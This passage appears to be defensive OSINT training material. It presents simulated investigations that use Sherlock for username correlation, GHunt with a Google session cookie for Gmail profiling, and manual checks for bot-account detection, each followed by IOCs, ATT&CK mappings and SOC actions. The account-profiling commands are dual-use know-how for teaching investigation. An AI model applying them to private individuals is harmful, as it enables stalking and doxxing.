Alias/Handle: h4ck3r_malaysia

Step 1: Tool Setup

Environment: Kali Linux or any system with Python 3 and Git installed

Installation Command:

git clone [Link]

cd sherlock
python3 -m pip install -r [Link]
Step 2: Run Sherlock with the Alias

Command:

python3 sherlock h4ck3r_malaysia

Sherlock will scan hundreds of platforms including GitHub, Telegram, Reddit, Pastebin,
TikTok and underground communities.

Step 3: Output
Platform URL Found Notes
GitHub [Link]/h4ck3r_malaysia Repository titled phishing-kit-v2
Telegram [Link]/h4ck3r_malaysia Channel shares stolen credential
dumps
Reddit [Link]/user/h4ck3r_malaysia Posts in r/hacking and r/OSINT
Pastebin [Link]/u/h4ck3r_malaysia Pastes contain credential logs
DeviantArt [Link]/h4ck3r_malaysia Profile image used as phishing lure
Codeberg [Link]/h4ck3r_malaysia Repo hosting modified phishing pages

Step 4: Manual Review and Enrichment

GitHub Repository Review:

• Repository: phishing-kit-v2
• Files:
o [Link] contains hardcoded exfil email: maliciousreceiver@[Link]
o [Link] links to tutorial video hosted on vidfiles[.]pw

Telegram Channel Analysis:

• Last post: “200 MY emails from [Link] breach”

• Group linked to @darkmarket_malaysia

Pastebin Contents:

• Paste titles:
o Captured_Logins_2025_07_20.txt
o API_C2_Endpoints.txt

Step 5: Correlation and Infrastructure Discovery

From pastes and GitHub links, you discover the following new IOCs:

IOC Type Value Notes

 Email maliciousreceiver@[Link] Exfil destination
Domain vidfiles[.]pw Used in tutorial video
IP [Link] Linked to GitHub-extracted C2

Cross-checking with VirusTotal and CIRCL Passive DNS reveals:

• vidfiles[.]pw previously used in malware campaigns

• [Link] has hosted other phishing kits

Step 6: Threat Actor Profile

Attribute Value
Alias h4ck3r_malaysia
Known Platforms GitHub, Telegram, Reddit, Pastebin, DeviantArt
Infrastructure vidfiles[.]pw, [Link]
Tactics Phishing kits, credential harvesting, API-based exfiltration
Language Use Malay + English mix
Tools Shared PHP-based login cloners, free email grabbers

MITRE ATT&CK Mapping

Technique Technique Name Justification
ID
T1585.001 Establish Accounts: Social Media Alias found on multiple platforms
T1566.002 Phishing: Spearphishing via Service Kits and email lures confirmed
T1005 Data from Local System Stolen credentials shared on
Pastebin
T1589.001 Gather Victim Identity: Credentials Paste contains credential dumps
T1583.006 Acquire Infrastructure: Web Used vidfiles[.]pw for exfil or lure
Domains

Remediation and Action Items

Action Item Description
IOC Blocklisting All linked domains, IPs and usernames submitted to blocklist
GitHub Abuse Report phishing-kit-v2 repo
Report
Telegram Abuse Report channel @h4ck3r_malaysia
Report
TTP Documentation Add Sherlock-based persona mapping to incident playbook
Automation Task Incorporate Sherlock into social reconnaissance workflow for
phishing investigations
GHUNT

GHunt is an OSINT tool focused on investigating Google accounts and Gmail addresses. It
provides metadata such as profile photos, calendar IDs, YouTube channels, Google Drive
files, phone verification status and Google Maps locations.

Use Cases:

• Investigate attackers or insiders using Gmail addresses.

• Identify related Google services connected to a specific account.
• Perform email fingerprinting to assess credibility and behavioural patterns.
• Detect potential fake Google accounts involved in phishing or impersonation.

Practical Application: During a business email compromise (BEC) attempt, the

attacker uses a Gmail account to pose as the CFO. GHunt reveals the account is
recently created, lacks any Google service activity and uses a stock photo as a profile
image, confirming it as fake.

Scenario Simulation: Gmail Account Profiling with GHunt

Objective: Verify the legitimacy of a Gmail account used in a suspected BEC attack by
profiling its connected Google services and metadata.

Tool: GHunt (GitHub: [Link]

Context

• Trigger:
A company finance executive reports receiving an internal payment request from a
Gmail account claiming to be the CFO.
• Suspicious Gmail Address:
[Link]@[Link]

Step 1: Tool Setup

Environment: Kali Linux or any Linux distro with Python

GHunt Installation:

git clone [Link]

cd GHunt
pip3 install -r [Link]
Initial Setup: GHunt requires a Google cookie (preferably SID, HSID, SSID) from a browser
session with Google. This cookie is needed to access user profile data.

Command to Configure Cookie:

python3 check_and_gen.py

Step 2: Run GHunt Against Target Gmail

Command:

python3 [Link] [Link]@[Link]

Step 3: GHunt Output

{
"email": "[Link]@[Link]",
"created": "2025-07-28",
"name": "",
"profile_pic": "[Link]
"google_services": {
"YouTube": null,
"Google Maps": null,
"Google Drive": null,
"Google Photos": null,
"Calendar": null
},
"phone_verified": false,
"location": null,
"profile_status": "Minimal",
"visibility": "Private"
}

Step 4: Analysis and Observations

Attribute Value Observation

Creation Date 2025-07-28 Recently created
Profile Picture Stock photo Not personalised
Google Services Used None Suspicious inactivity
Phone Verified False No verified number
Profile Status Minimal Likely automation
Name Field Empty Not linked to real identity
This information strongly suggests the account is fraudulent and was created solely for the
purpose of impersonation.

Step 5: Correlation and Risk Assessment

The GHunt output is correlated with other alerts:

• Email headers show SPF and DKIM fail.

• Domain linked in the body (quickfiles-finance[.]com) was registered 2 days ago.
• The email used similar language and formatting to the real CFO’s past emails (likely
scraped).

Step 6: SOC Action Plan

Action Item Description

Block Email Address Add to email gateway blocklist
Add Domain to Watchlist quickfiles-finance[.]com added to DNS monitoring
Alert Executives and Send security awareness alert
Finance
Report to Google Abuse Report fraudulent account to Google
Update TTP Database Document account creation pattern and fake Gmail
tactics
Integrate GHunt in Workflow Add to BEC response playbook as initial verification step

MITRE ATT&CK Mapping

Technique Technique Name Reason

ID
T1585.001 Establish Accounts: Social Media / Gmail account created for
Web Email impersonation
T1566.001 Phishing: Spearphishing via Email Targeted internal request
T1586 Compromise Accounts Attempt to pose as CFO
T1583.006 Acquire Infrastructure: Email Used Gmail to bypass internal
Accounts mail filters
ACCOUNT ANALYSIS

Account Analysis refers to the practice of manually or automatically assessing user

accounts across social platforms, forums and digital services to evaluate authenticity,
behaviour, connections and risk. It is often done using OSINT tools, custom scripts or
human expertise.

Use Cases:

• Assess whether a social media profile is legitimate, fake or part of a bot network.
• Analyse user posting behaviour, language, timezone, geolocation tags and image
metadata.
• Identify sock puppet accounts or coordinated influence operations.
• Evaluate risk associated with followers or contacts of key executives.

Practical Application: During a disinformation campaign, multiple social media

accounts spread false information about the organisation. Analysts perform account
analysis on the profiles, revealing that many share similar creation dates, post
patterns and reused photos, indicating they are part of a botnet or influence network

Scenario Simulation: Coordinated Bot Account Detection During Disinformation

Campaign

Objective: Evaluate the authenticity and coordination level of multiple suspicious

accounts spreading misinformation about the organisation across social media.

Methodology: Manual and tool-assisted account profiling using OSINT principles.

Context

• Trigger:
A trending Twitter/X hashtag #CompanyXFraud starts circulating, damaging the
reputation of the organisation.
Several new accounts post nearly identical messages, tags and images.
• Suspicious Accounts:

@realfacts_truth
@whistle_truther
@insiderreports_
@verify_financials

Step 1: Data Collection

Tools:
 • Twitter web search
• TweetDeck / Twint / X API (for automation)
• [Link] (snapshot posts)
• ExifTool (image metadata)
• Browser DevTools (headers, timestamps)

Actions:

• Download public profile data (bio, creation date, posts, followers).

• Screenshot and archive suspicious tweets.
• Collect any shared images or media.

Step 2: Manual Account Profiling

Account Create Follower Followin Profile Posting Notes
d On s g Pic Pattern
Reuse
@realfacts_truth 2025- 4 1000+ Stock 30 No replies or
07-15 image tweets/da conversation
y, 90% s
hashtag
@whistle_truthe 2025- 6 800+ Same Same All retweets
r 07-15 stock wording, of 2
image same time accounts
@insiderreports 2025- 5 950+ Differen Identical Linked to
_ 07-15 t image tweet suspicious
format domain
@verify_financial 2025- 3 990 Profile Retweets No bio or
s 07-15 blank only history

Findings:

• All accounts created on the same date.

• Follow similar accounts and post at near-identical times.
• Minimal organic interaction; followers inflated.
• Shared/reused media traced via reverse image search.

Step 3: Behavioural and Linguistic Pattern Matching

Analysis:

• All tweets use phrases like:

"Time to expose #CompanyXFraud. The public deserves truth."
Indicates scripted or automated behaviour.
 • All posts made between 2AM–4AM GMT+8, inconsistent with Malaysia’s normal
business hours.
• Hashtags recycled across all accounts.

Step 4: Visual and Metadata Inspection

Media Forensics:

• Downloaded image from @realfacts_truth and @whistle_truther.

exiftool profile_image.jpg

Output:

Create Date: 2021:06:02 14:10:25

Software: Adobe Photoshop Express
Device: Huawei Nova 3i

Reverse Image Search:

• Matches 3 free stock image sites.

• Also used by fake Telegram scam group account.

Step 5: Cross-Platform Linkage

Use Sherlock or manual search to check username reuse.

sherlock whistle_truther

Findings:

• Same alias on Telegram, Reddit and GitHub.

• Posts in hacking forums with anti-company sentiment.

Step 6: Risk Assessment and Reporting

Metric Value
Account Authenticity Low (recent, no history, same creation date)
Coordination Probability High (identical posting pattern, content)
Risk to Organisation Medium to High (reputation damage + misinformation spread)
Network Indicators 4 Accounts, 2 reused images, 1 phishing link

Step 7: SOC Action Plan

Step Action
Reporting Submitted to Twitter/X Abuse with screenshots
 IOC Ingestion All usernames, hashtags and URLs added to MISP and SIEM
Reputation Sent counter-message campaign with verified company post
Protection
Monitoring Initiated Alert rule for #CompanyXFraud and new accounts with similar
bios
Risk Wiki Entry New entry: "Coordinated Bot Disinfo Campaign – 2025-08-05"

MITRE ATT&CK Mapping

Technique Technique Name Reason
ID
T1585.001 Establish Accounts: Social Fake accounts created to spread
Media Accounts misinformation
T1587.001 Develop Capabilities: Malware Accounts linked to phishing link
sharing
T1566.002 Spearphishing via Social Media Targeting users via fake DMs
T1646 Manipulate Content: Social Fabricating trending campaigns to
Media Posts discredit company